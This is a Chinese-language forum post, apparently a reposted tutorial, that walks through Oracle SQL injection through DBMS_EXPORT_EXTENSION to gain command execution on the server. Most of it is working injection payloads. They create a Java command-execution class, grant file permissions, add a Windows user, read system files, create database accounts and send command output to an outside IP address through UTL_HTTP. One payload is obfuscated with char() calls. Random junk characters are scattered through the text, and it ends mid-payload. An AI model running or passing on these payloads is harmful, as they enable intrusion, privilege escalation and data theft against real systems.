
实例演示oracle注入获取cmdshell的全过程

发表于 2012-12-18 12:21:48
以下的演示都是在 web 上的 SQL*Plus 中执行的;在 web 注入时,把 select SYS.DBMS_EXPORT_EXTENSION..... 改成:

8 b: {. s: L- U6 U) a) H8 ?  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
的形式即可。(用 'a'|| 是为了让语句返回 true 值)
语句有点长,可能要用 POST 提交。
以下是各个步骤:
1. 创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在 Oracle 上创建 Java 包 LinxUtil,里面有两个函数:runCMD 用于执行系统命令,readFile 用于读取文件:
/xxx.jsp?id=1 and '1'<>'a'||(
4 h6 N1 R% J' @) S& H2 L' Rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''& @- w8 E4 ?( S- Q
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader() g$ Z! b2 r" x, u) Q
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}, @( ~1 e9 N( Q- c" z9 x, H3 H
}'''';END;'';END;--','SYS',0,'1',0) from dual
* L  D4 N$ h' H! o# G' r4 C)
2 |5 V1 H% _/ ~$ ?6 t------------------------
如果 URL 有长度限制,可以把 readFile() 函数块去掉,即:
/xxx.jsp?id=1 and '1'<>'a'||( ; }  T7 G, y& `. y
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
8 a" c- D) d; T2 X3 @. o1 w+ Tcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(! ~/ r* d$ j0 X* F! F6 _
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}" d6 g, a; f6 `# N  {' l# n- q
}'''';END;'';END;--','SYS',0,'1',0) from dual
& Y6 S  T6 p% Q5 v)
同时把后面步骤中提到的对 readFile() 的处理语句去掉。
------------------------------
2. 赋 Java 权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual; [7 ]8 n" T; s0 @) V3 N6 H
3. 创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 w' d2 E/ y, t. k  y" rcreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual/ L! o0 {9 n( w: y3 p
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
# E& _  S" G" h9 {1 m: `/ h+ Bcreate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual8 [5 v1 {5 }  w0 S3 N3 y
4. 赋予 public 执行函数的权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual0 R- ~& O. M* W6 Y5 m
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual- Q. f3 w' w: {) _6 J; N2 w( t% U
5. 测试上面的几步是否成功
, M; ]' o. u# R' M8 G/ rand '1'<>'11'||( ' W$ D. y8 h% r; S( z, _3 p
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
  _/ j, c& J. G9 q: `1 E/ {) / k* [6 @. ?; f0 z4 ]' B! w
and '1'<>(
! s; W; Q8 }5 c( ?. uselect  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
- s$ ]* d8 E, s  D; N( U& Q) 4 e" P5 `# t9 t, y$ I, V
6. 执行命令:
7 g2 R6 D6 s8 W% ?3 ^% T' _/xxx.jsp?id=1 and '1'<>( 7 y; E- F: @& W% _6 G" |7 K" R
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual 0 }* W1 @/ p6 S/ j+ [& m7 V; ~
3 x- L1 T  i, u2 c( r
)
! M' h+ V# k3 m: b/xxx.jsp?id=1 and '1'<>( " N! t3 r: |2 M- {  ^( F. ^
select  sys.LinxReadFile('c:/boot.ini') from dual
! ^+ c: Y' J# q1 _
8 n+ Z% l1 Q; o; I)+ i. `5 y# Q( B  I" K2 c" L" B/ ~
  
注意 sys.LinxReadFile() 返回的是 varchar 类型,不能用 "and 1<>" 代替 "and '1'<>"。
如果要查看运行结果,可以用 union:
+ K( ]$ w. ~9 N+ @5 o3 [/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual( p+ W& g* _; _3 d9 S& l; o
或者用 UTL_HTTP.request():
/xxx.jsp?id=1 and '1'<>(
6 o0 w; S9 H$ O) B5 x- ySELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
& j$ g5 B( {: W) 7 ~/ L# H! v5 `- ^( C9 e
/xxx.jsp?id=1 and '1'<>(
& i+ e% Q# [- ^6 J" R0 w, CSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
6 v! }, ^- l/ h  l- a)
注意:用 UTL_HTTP.request 时,要用 REPLACE() 把空格、换行符替换掉,否则无法提交 HTTP 请求。用 utl_encode.base64_encode 也可以。
--------------------
6. 内部变化
通过以下命令可以查看 all_objects 表的改变:
$ \" f, {- C1 J# V" J3 \7 P! Xselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
7. 删除我们创建的函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
0 ~: Y5 U2 J5 O& r3 S) |drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法:
创建 Oracle 帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''2 t1 \2 ^9 L2 h/ O  D0 p% `
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual2 M- P8 n6 B( w  d9 m
即:
( [* _! v1 e  F1 K& Xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
6 V0 n  I9 Y' q- n) q2 schr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual # b+ P2 J, i, p& [
确定漏洞存在:
1<>( - B! N  x0 @7 r8 ?, {  O2 U5 s5 e
select user_id from all_users where username='LINXSQL'
0 Y7 n9 B& `5 P( X1 r) ' y1 P$ W( i: n, S
给 linxsql 连接权限:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 J/ O' S% d, L% _
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
2 m6 `1 A" e; V$ y删除帐号: " _) D7 Y1 ?7 Q) s) y
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
+ i7 e% e: i% w$ Mdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual 4 \; ~- c% v1 q- L5 _
======================
以下方法创建一个可以执行多条语句的函数 Linx_query(),执行成功的话返回数值 "1";但权限是继承的,可能仅仅是 public 权限,作用似乎不大,真的要用到的话可以考虑 grant dba to 当前的 User:
, K+ F" i) t$ z4 R  @" S1 J1.jsp?id=1 and '1'<>(
' \0 N  ~0 h# T6 T! o0 z3 R: T3 Xselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''5 m! P0 u: k3 ~5 w- B
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual7 C. l2 o" {3 D0 U" Y; r5 ^
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
& K7 ]  p9 }5 r; P ); ~3 I8 G; m5 E& x. W  @% @; b

1 q) g, L/ V, ?3 z' S# t( v& w6 G5 I1 Z+ z
) e& P9 m& U. Y7 w